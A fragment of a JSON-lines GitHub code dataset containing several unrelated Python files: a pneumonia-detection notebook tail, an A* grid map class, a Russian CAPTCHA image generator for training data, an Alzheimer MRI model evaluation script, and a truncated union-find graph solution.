'PredictionString'])\noutput.head(100)\n\n# In[ ]:\n\n\n## show submission.csv content\n#os.chdir(ROOT_DIR)\n#!cat submission.csv\n\n# In[ ]:\n\n\n# show a few test image detection example\ndef visualize(): \n image_id = random.choice(test_image_fps)\n ds = pydicom.read_file(image_id)\n \n # original image \n image = ds.pixel_array\n \n # assume square image \n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n \n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n resized_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n print(patient_id)\n\n results = model.detect([resized_image])\n r = results[0]\n for bbox in r['rois']: \n print(bbox)\n x1 = int(bbox[1] * resize_factor)\n y1 = int(bbox[0] * resize_factor)\n x2 = int(bbox[3] * resize_factor)\n y2 = int(bbox[2] * resize_factor)\n cv2.rectangle(image, (x1,y1), (x2,y2), (77, 255, 9), 3, 1)\n width = x2 - x1 \n height = y2 - y1 \n print(\"x {} y {} h {} w {}\".format(x1, y1, width, height))\n plt.figure() \n plt.imshow(image, cmap=plt.cm.gist_gray)\n\nvisualize()\n\n# In[ ]:\n\n\n# remove files to allow committing (hit files limit otherwise)\n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample774.py", "file_name": "sample774.py", "file_ext": "py", "file_size_in_byte": 17459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "mrcnn.config.Config", "line_number": 96, "usage_type": "name"}, {"api_name": "mrcnn.utils.Dataset", "line_number": 130, "usage_type": "attribute"}, {"api_name": "mrcnn.utils", "line_number": 130, "usage_type": "name"}, {"api_name": "pydicom.read_file", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pydicom.read_file", "line_number": 199, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 232, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 301, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 301, "usage_type": "name"}, {"api_name": "imgaug.augmenters.SomeOf", "line_number": 309, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 309, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 310, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 310, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Affine", "line_number": 311, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 311, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 317, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 317, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 335, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 346, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 354, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path", "line_number": 369, "usage_type": "attribute"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 385, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 418, "usage_type": "call"}, {"api_name": "mrcnn.model.load_image_gt", "line_number": 421, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 421, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 426, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 430, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 433, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 433, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 455, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 460, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 461, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 461, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path", "line_number": 468, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 512, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 527, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 538, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 539, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 562, "usage_type": "attribute"}, {"api_name": "mrcnn.visualize", "line_number": 564, "usage_type": "call"}]} +{"seq_id": "23709131351", "text": "from random import randint\nfrom enum import Enum\n\nclass MAP_ENTRY_TYPE(Enum): # это перечисление определяет различные типы ячеек, которые могут присутствовать на карте.\n\tMAP_EMPTY = 0,\n\tMAP_BLOCK = 1,\n\tMAP_TARGET = 2,\n\tMAP_PATH = 3,\n\nclass WALL_DIRECTION(Enum): # это перечисление определяет различные направления, в которых может быть обращена стена.\n\tWALL_LEFT = 0,\n\tWALL_UP = 1,\n\tWALL_RIGHT = 2,\n\tWALL_DOWN = 3,\n\t\nmap_entry_types = {0:MAP_ENTRY_TYPE.MAP_EMPTY, 1:MAP_ENTRY_TYPE.MAP_BLOCK, 2:MAP_ENTRY_TYPE.MAP_TARGET, 3:MAP_ENTRY_TYPE.MAP_PATH}\n# сопоставляет целочисленные значения с элементами перечисления MAP_ENTRY_TYPE. \n# Это используется методом getType для преобразования целочисленного значения ячейки в соответствующее значение MAP_ENTRY_TYPE.\nclass Map():\n\tdef __init__(self, width, height): \n\t\tself.width = width\n\t\tself.height = height\n\t\tself.map = [[0 for x in range(self.width)] for y in range(self.height)]\n# конструктор класса Map, который инициализирует ширину и высоту карты и создает пустую двумерную сетку ячеек с указанными размерами.\t\n\tdef generatePos(self, rangeX, rangeY):\n\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\twhile self.map[y][x] == 1:\n\t\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\treturn (x , y)\n# этот метод генерирует случайную позицию (x, y) в пределах указанного диапазона значений x и y. \n# Он продолжает генерировать новые случайные позиции, пока не найдет ту, которая не является заблокированной ячейкой (т. е. ячейкой со значением 1).\t\n\tdef resetMap(self, value):\n\t\tfor y in range(self.height):\n\t\t\tfor x in range(self.width):\n\t\t\t\tself.setMap(x, y, value)\n# этот метод сбрасывает всю карту, устанавливая для всех ячеек указанное значение.\n\tdef setMap(self, x, y, value):\n\t\tif value == MAP_ENTRY_TYPE.MAP_EMPTY:\n\t\t\tself.map[y][x] = 0\n\t\telif value == MAP_ENTRY_TYPE.MAP_BLOCK:\n\t\t\tself.map[y][x] = 1\n\t\telif value == MAP_ENTRY_TYPE.MAP_TARGET:\n\t\t\tself.map[y][x] = 2\n\t\telse:\n\t\t\tself.map[y][x] = 3\n# этот метод устанавливает значение ячейки в позиции (x, y) на указанное значение.\n\tdef isVisited(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не была посещена (т. е. ее значение не равно 1), и False в противном случае.\n\tdef isMovable(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не является заблокированной ячейкой (т. е. ее значение не равно 1), и False в противном случае.\t\n# \t\n\tdef isValid(self, x, y):\n\t\tif x < 0 or x >= self.width or y < 0 or y >= self.height:\n\t\t\treturn False\n\t\treturn True\n# этот метод возвращает True, если позиция (x, y) находится в пределах границ карты, и False в противном случае.\t\n\tdef getType(self, x, y):\n\t\treturn map_entry_types[self.map[y][x]]\n# этот метод возвращает тип ячейки в позиции (x, y) как элемент перечисления MAP_ENTRY_TYPE.\n\tdef showMap(self):\n\t\tfor row in self.map:\n\t\t\ts = ''\n\t\t\tfor entry in row:\n\t\t\t\tif entry == 0:\n\t\t\t\t\ts += ' 0'\n\t\t\t\telif entry == 1:\n\t\t\t\t\ts += ' #'\n\t\t\t\telse:\n\t\t\t\t\ts += ' X'\n\t\t\tprint(s)\n# этот метод выводит карту на консоль с заблокированными ячейками, представленными '#', и всеми остальными ячейками, представленными символом пробела.\t", "repo_name": "NikitaBukreyev/algoritms", "sub_path": "lab2/a_star/GameMap.py", "file_name": "GameMap.py", "file_ext": "py", "file_size_in_byte": 4428, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 10, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "6767056735", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport string\nimport os\nimport shutil\nimport uuid\nfrom captcha.image import ImageCaptcha\nimport codecs\nimport itertools\nimport random\n\nMETA_FILENAME = 'meta.json'\nSTRING_DATA = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nFLAGS = None\n\ndef _gen_captcha(img_dir, n, width, height):\n #print('dir ' + img_dir)\n if os.path.exists(img_dir):\n shutil.rmtree(img_dir)\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n print('n', n)\n font_files = ['63.ttf', '5751.ttf']\n image = ImageCaptcha(width=width, height=height, fonts=font_files)\n\n with open('russian.txt', 'r', encoding='UTF-8') as file:\n file_data = file.read().split('\\n')\n\n for _ in range(n):\n for i in file_data:\n captcha = ''.join(i)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n choices = STRING_DATA\n\n data = list(itertools.permutations(choices, 4))\n print(len(data))\n length = 10\n for _ in range(n):\n for i in range(length):#num_per_image\n x = random.choice(data)\n captcha = ''.join(x)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n\ndef build_file_path(data_dir, npi, n_epoch, x):\n return os.path.join(data_dir, 'char-%s-epoch-%s' % (npi, n_epoch), x)\n\n\ndef gen_dataset(data_dir, n_epoch, npi, test_ratio):\n width = 40 + 20 * npi#40 + x * 20\n height = 100#100\n\n # meta info\n meta = {\n 'num_per_image': npi,\n 'label_size': len(STRING_DATA),\n 'label_choices': STRING_DATA,\n 'n_epoch': n_epoch,\n 'width': width,\n 'height': height,\n }\n #print(meta)\n\n train_path = build_file_path(data_dir, npi, n_epoch, 'train')\n test_path = build_file_path(data_dir, npi, n_epoch, 'test')\n print(train_path, test_path)\n\n _gen_captcha(train_path, n_epoch, width, height)\n _gen_captcha(test_path, max(1, int(n_epoch * test_ratio)), width, height)\n\n meta_filename = build_file_path(data_dir, npi, n_epoch, META_FILENAME)\n\n print(meta)\n with codecs.open(meta_filename, 'w', encoding='UTF-8') as f:\n json.dump(meta, f, indent=4)\n print('write meta info in %s' % meta_filename)\n\n\nif __name__ == '__main__':\n data_dir = 'E:\\\\Python\\\\captcha-tensorflow\\\\datasets\\\\images'\n n_epoch = 2\n nip = 4\n ratio = 0.2\n\n gen_dataset(data_dir, n_epoch, nip, ratio)\n", "repo_name": "bakaInc/3d_catpcha_solve", "sub_path": "datasets/gen_captcha.py", "file_name": "gen_captcha.py", "file_ext": "py", "file_size_in_byte": 2528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "captcha.image.ImageCaptcha", "line_number": 27, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 35, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 36, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 47, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "20270456033", "text": "import numpy as np\r\nimport os\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n#In[1]:\r\n\r\n# - import test arrays (select path)\r\nX_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_image_emci.npy\")\r\ny_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_label_emci.npy\")\r\n\r\nprint (\"Dados de teste:\", len(X_test))\r\n\r\n\r\n#In[2]:\r\ntest_image = X_test\r\ntest_label = y_test\r\nprint(test_image.shape)\r\n\r\n\r\n#In[3]:\r\nbatch_size = 3\r\ntest_loader = tf.data.Dataset.from_tensor_slices((X_test, y_test))\r\n\r\ndef test_preprocessing(volume, label):\r\n \"\"\"Process test data by only adding a channel and covert to rgb.\"\"\"\r\n volume = tf.expand_dims(volume, axis=3)\r\n volume=tf.image.grayscale_to_rgb(volume)\r\n return volume, label\r\n\r\n# - do not shuffle the test dataset \r\ntest_dataset = (\r\n test_loader.map(test_preprocessing)\r\n .batch(batch_size)\r\n .prefetch(2)\r\n)\r\n\r\n#In[4]:\r\n\r\n\r\n# - import the trained model\r\nfinal_model = keras.models.load_model('/content/drive/MyDrive/TESE/Final_class/seresnet152_final_emci.h5')\r\n\r\nfinal_model.evaluate(test_dataset)\r\nfinal_predict = final_model.predict(test_dataset)\r\n\r\nprint(final_predict)\r\n\r\npredict = (final_predict > 0.5).astype('int')\r\n\r\nprint(predict)\r\nprint(test_label)\r\n\r\n# - create an array with the desired labels \r\nlabels_multi=np.array([\"CN\", \"EMCI\", \"LMCI\", \"AD\"])\r\nlabels_bi=np.array([\"CN\", \"AD\"])\r\n\r\n#In[5]:\r\nfrom sklearn.metrics import accuracy_score, ConfusionMatrixDisplay, classification_report, roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\n\r\n#MULTICLASS\r\nConfusionMatrixDisplay.from_predictions(test_label.argmax(axis=1), predict.argmax(axis=1), display_labels=labels_multi, cmap=plt.cm.Blues)\r\n\r\n#BINARYCLASS\r\nConfusionMatrixDisplay.from_predictions(test_label, predict,display_labels=labels_bi, cmap=plt.cm.Blues)\r\n\r\n\r\n\r\n#In[6]:\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_roc_curve(true_y, y_prob):\r\n\r\n fpr, tpr, thresholds = roc_curve(true_y, y_prob)\r\n plt.plot(fpr, tpr, label='Model')\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n\r\nplot_roc_curve(test_label, final_predict)\r\nprint(f'Model AUC score: {roc_auc_score(test_label, final_predict)}')\r\n\r\n\r\n\r\n\r\n#In[7]:\r\n\r\nhistory = pd.read_csv('/content/drive/MyDrive/TESE/Final_class/seresnet152_lmci___.csv')\r\nprint(history)\r\n\r\n\r\n#In[8]:\r\n\r\n# - Loss plot\r\nplt.plot(history['loss'], label= 'Training Loss')\r\nplt.plot(history['val_loss'], label= 'Validation Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\n# - Accuracy plot\r\nplt.plot(history['binary_accuracy'], label= 'Training Accuracy')\r\nplt.plot(history['val_binary_accuracy'], label= 'Validation Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#In[9]:\r\n\r\n#MULTICLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'EMCI', 'LMCI','AD']))\r\n\r\n#BINARYCLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'AD']))\r\n\r\n", "repo_name": "MarianaCoelho9/Alzheimer-Detection", "sub_path": "Test_model.py", "file_name": "Test_model.py", "file_ext": "py", "file_size_in_byte": 3137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.load", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.grayscale_to_rgb", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "31635186798", "text": "# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\nn,m = map(int,readline().split())\nab = list(map(int,read().split()))\n\n####################\nimport sys\nsys.setrecursionlimit(10**6)\n\nclass UnionFind():\n def __init__(self, n):\n self.n = n\n self.parents = [-1] * n\n\n def find(self,x):\n if(self.parents[x] < 0):\n return x\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n\n def size(self, x):\n return self.parents[ self.find(x) ] * -1\n\n def same(self, x, y):\n x_root = self.find(x)\n y_root = self.find(y)\n return (x_root == y_root)\n\n def union(self,x,y):\n x_root = self.find(x)\n y_root = self.find(y)\n if(x_root == y_root):\n return\n\n if( self.parents[x_root] <= self.parents[y_root] ):\n self.parents[x_root] += self.parents[y_root]\n self.parents[y_root] = x_root\n else:\n self.parents[y_root] += self.parents[x_root]\n self.parents[x_root] = y_root\n\n def members(self,x):\n root = self.find(x)\n ret = [ i for i in range(self.n) if self.find(i) == root ]\n return ret\n\n def roots(self):\n ret = [ i for i in range(self.n) if self.parents[i] < 0]\n return ret\n\n def group_count(self):\n return len(self.roots())\n\n def all_group_members(self):\n return {r: self.members(r) for r in self.roots()}\n\nimport random\n\nn = 10\nremains = [set(range(n)) for _ in range(n)]\nuf = UnionFind(n)\nedges = set()\nwhile(uf.size(0) < n):\n i = random.randint(0,n-1)\n # print(i)\n if(not remains[i]):\n continue\n js = list(remains[i])\n j = random.choice(js)\n # print(i,j)\n remains[i].remove(j)\n if(i==j):\n continue\n remains[j].remove(i)\n\n edges.add((i+1,j+1))\n uf.union(i,j)\n # print('add')\n # print(uf.parents)\n\n# print(edges)\n# print(len(edges))\n\nm = len(edges)\nab = []\nfor i,j in edges:\n ab.append(i)\n ab.append(j)\n\nprint(ab)\nprint(n,m)\n\n#####################\n\nif(m%2==1):\n print(-1)\n exit()\n\nit = iter(ab)\nlinks = [[] for _ in range(n+1)]\nfor a,b in zip(it,it):\n links[a].append(b)\n links[b].append(a)\n\nfor i,l in enumerate(links):\n print(i,l)\n\ndepth = [-1] * (n+1)\nparent = [0] * (n+1)\nchild = [set() for _ in range(n+1)]\nhq_dep = []\nd = defaultdict(int)\n\nstack = [1]\ndepth[1] = 0\nheappush(hq_dep, (0,1))\nnow_dep = 1\nwhile(stack):\n stack2 = []\n while(stack):\n i = stack.pop()\n for j in links[i]:\n if(depth[j] == -1):\n depth[j] = now_dep\n parent[j] = i\n d[i*10**6+j] = 1\n heappush(hq_dep,(now_dep*-1,j))\n stack2.append(j)\n else:\n child[j].add(i)\n now_dep += 1\n stack = stack2[::]\n\n# print(parent)\n# print(child)\n# print(d)\n# print(hq_dep)\n\nans = []\nfor _ in range(m//2):\n while(True):\n i_dep,i= hq_dep[0]\n if(parent[i]==0):\n heappop(hq_dep)\n else:\n break\n\n if(child[i]):\n j = child[i].pop()\n if(child[i]):\n k = child[i].pop()\n else:\n k = parent[i]\n parent[i] = 0\n\n if(parent[j]==i):\n parent[j] = 0\n else:\n child[j].remove(i)\n if(parent[k]==i):\n parent[k] = 0\n else:\n child[k].remove(i)\n\n ans.append((i,j))\n ans.append((i,k))\n\n\n else:\n j = parent[i]\n child[j].remove(i)\n heappop(hq_dep)\n if(child[j]):\n k = child[j].pop()\n else:\n k = parent[j]\n parent[j] = 0\n if(parent[k]==j):\n parent[k] = 0\n else:\n 